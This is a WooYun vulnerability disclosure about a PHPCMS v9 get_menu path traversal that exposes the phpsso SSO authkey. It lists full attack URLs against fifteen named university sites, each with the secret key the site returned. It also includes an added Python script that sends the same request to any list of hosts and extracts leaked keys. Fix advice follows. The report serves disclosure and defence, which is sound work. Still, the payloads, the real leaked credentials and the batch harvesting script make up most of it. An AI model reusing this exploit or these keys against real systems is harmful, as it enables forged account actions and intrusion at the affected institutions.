Vulnerability summary
Defect ID: wooyun-2015-0128335
Title: Sensitive information disclosure at 16 universities (batch report)
Related vendor: CCERT (CERNET education-network emergency response group)
Author: blaz
Submitted: 2015-07-22 17:14
Fixed: 2015-07-27 17:16
Published: 2015-07-27 17:16
Type: Sensitive information disclosure
Severity: Medium
Self-assessed rank: 10
Status: handed to the third-party partner organization (CCERT) for handling
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-07-22: details sent to the vendor, awaiting vendor handling
2015-07-27: vendor actively ignored the vulnerability, details disclosed to the public
Brief description:
Sensitive information disclosure at 16 universities: each host runs PHPCMS v9 and exposes the SSO authkey of its phpsso_server through an unauthenticated API request.
Detailed description:
All of the hosts below run PHPCMS v9 with the phpsso_server component installed beside the main site. The get_menu API (api.php?op=get_menu&act=ajax_getlist) takes the cache file name (cachefile) and the cache sub-directory (path) straight from the query string, loads that cache file, and echoes the field named by key for every entry whose parentid matches, wrapped in the JSONP callback the caller supplies. Because the two path parameters are not confined to the intended cache directory, a value that walks up three directories into phpsso_server/caches/caches_admin/caches_data/applist, combined with key=authkey, returns the SSO authkey stored in that application list; the empty comma-separated slots in the response are entries whose authkey field is blank. The authkey is the shared secret between the site and its phpsso_server, so whoever holds it can forge requests to the SSO interface as the site itself (for example creating or modifying member accounts). No login is required, and the request is an ordinary GET that shows up in the access log as a single line. The report's traversal uses backslashes, which PHP honours as a directory separator only on Windows hosts; a site on a POSIX host would be reached with the equivalent forward-slash form.
For each host, the request sent and the value it returned. The first entry shows the full JSONP body; for the others only the key extracted from the same position was recorded.

http://wzb.bnu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aaaaa([",h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X,,,"])

http://xcb.ytu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
8Uh9SlA7TsbITlkbn0PTCBEgGu2YKExC

http://www.ykuc.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
7OoWDH7UfC24hII8F2pPb01U7Q7OxSay

http://sfl.swjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
zfQgF9q94PPw7PLqAsPLuHb0Qw9PGuM2

http://mec.xjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
xhmU2v8QCvBgvf8VIfRvYKtneBnyb6Za

http://jwc.shsmu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
MQgwGUdYCZeNHsMb4HShP0hF5gQpSgto

http://rsgis.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Dz99Zl9DzvZgazpknlDrplNzfaefQMzc

http://cj.dhu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Hlra5Dsc8VwN8ggbgppFVrkyXgI9Y5gi

http://gr.xupt.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
GO96qk2bSlbK6xE1bMmQXRrXuO1I0zFS

http://software.hebtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
hF5B9BbCByB2c1RyRk1AI9D5MSuPVYk7

http://kj.swufe.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
sg4w8IRFeCg0r6hWlB2SQGw6SgSi8C9t

http://oursim.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
PndaqkaRH6Pe2G7nkPnxSUSLGafw9Gno

http://www.lib.sjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
cmqwkeX4D9RELpW82oCMCclBsdzyVGg5

http://gibs.gcu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aZHD4GxRf2aOrbZ4ehaaXK2vxMD2G0kb

http://hqglc.usx.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
29aVM9gsH7YsqQFT80v0lC75vVBQFHEI
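A small checker for the request shown above, added here as an example; it is not part of the original report and not PHPCMS code. It builds the same get_menu request for a list of sites, fetches it, and parses the JSONP body into the leaked key(s). The parser is written from the one full response body the report shows (the aaaaa([",<key>,,,"]) shape); the callback name, the 16-to-64-character alphanumeric filter, the timeout and the forward-slash traversal variant are assumptions made here, and the sample bodies at the bottom are constructed for the offline run.

```python
"""Batch check for the PHPCMS v9 get_menu authkey disclosure.

Added example, not from the original report or from PHPCMS. Only run it
against hosts you are authorised to test.
"""
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urlencode

CALLBACK = "aaaaa"  # callback name used in the report; any identifier works

# The report's traversal uses backslashes, which PHP treats as a directory
# separator only on Windows; the POSIX form is an assumed variant for
# sites hosted on Linux.
TRAVERSAL = {
    "windows": r"..\..\..\phpsso_server\caches\caches_admin\caches_data\applist",
    "posix": "../../../phpsso_server/caches/caches_admin/caches_data/applist",
}

# Response shape seen in the report: callback(["v1,v2,..."])
_JSONP = re.compile(r'^\s*(\w+)\(\["(.*)"\]\)\s*$', re.S)
# The keys in the report are 32 alphanumeric characters; the bounds are an
# assumption that tolerates other lengths while rejecting menu labels.
_KEY = re.compile(r"^[A-Za-z0-9]{16,64}$")


def build_url(base, sep="windows"):
    """Return the get_menu request URL for a site root such as http://host/.

    urlencode percent-encodes the backslashes; PHP decodes them again before
    the cache path is assembled, so the traversal is unchanged.
    """
    params = {
        "op": "get_menu",
        "act": "ajax_getlist",
        "callback": CALLBACK,
        "parentid": "0",
        "key": "authkey",
        "cachefile": TRAVERSAL[sep],
        "path": "admin",
    }
    return base.rstrip("/") + "/api.php?" + urlencode(params)


def extract_authkeys(body, callback=CALLBACK):
    """Return the candidate authkeys in a JSONP body of the report's shape.

    Returns an empty list when the body is not the expected callback, is an
    error page, or carries only ordinary menu labels (i.e. no leak).
    """
    match = _JSONP.match(body)
    if not match or match.group(1) != callback:
        return []
    return [v for v in match.group(2).split(",") if _KEY.match(v)]


def check_host(base, sep="windows", timeout=10):
    """Fetch the request and parse it. Returns (url, keys, error_or_None)."""
    url = build_url(base, sep)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace")
    except (urllib.error.URLError, OSError) as exc:
        return url, [], str(exc)
    return url, extract_authkeys(body), None


# Constructed sample bodies: the first is the body quoted in the report,
# the others are what a patched or unrelated site might return.
SAMPLE_LEAK = 'aaaaa([",h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X,,,"])'
SAMPLE_MENU = 'aaaaa(["Home,About us,Contact"])'
SAMPLE_404 = "<html><body>404 Not Found</body></html>"

if __name__ == "__main__":
    if len(sys.argv) == 1:
        for body in (SAMPLE_LEAK, SAMPLE_MENU, SAMPLE_404):
            print(repr(body[:40]), "->", extract_authkeys(body))
    for site in sys.argv[1:]:
        url, keys, err = check_host(site)
        status = "ERROR " + err if err else ("LEAK " + ",".join(keys) if keys else "clean")
        print(site, status)
```

Run without arguments to see the parser on the constructed samples; pass site roots (http://host/) to test live. A LEAK result means the site is still exposing its SSO secret and the key must be rotated on both the site and its phpsso_server, not merely hidden.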
Proof of vulnerability:
Same requests and responses as listed under Detailed description.
Fix recommendation:
Upgrade to the latest version. Upgrading alone does not undo the disclosure: every authkey returned above is already public, so it must also be regenerated in phpsso_server and in each connected site's configuration. Until the upgrade is in place, reject cachefile and path values that contain anything beyond letters, digits and underscores, and block api.php?op=get_menu at the web server for anonymous clients.
Copyright notice: please credit the source when reposting: blaz@WooYun
Vulnerability response
Vendor response:
Severity: no impact, ignored by vendor
Ignored at: 2015-07-27 17:16
Vendor reply:
Latest status:
None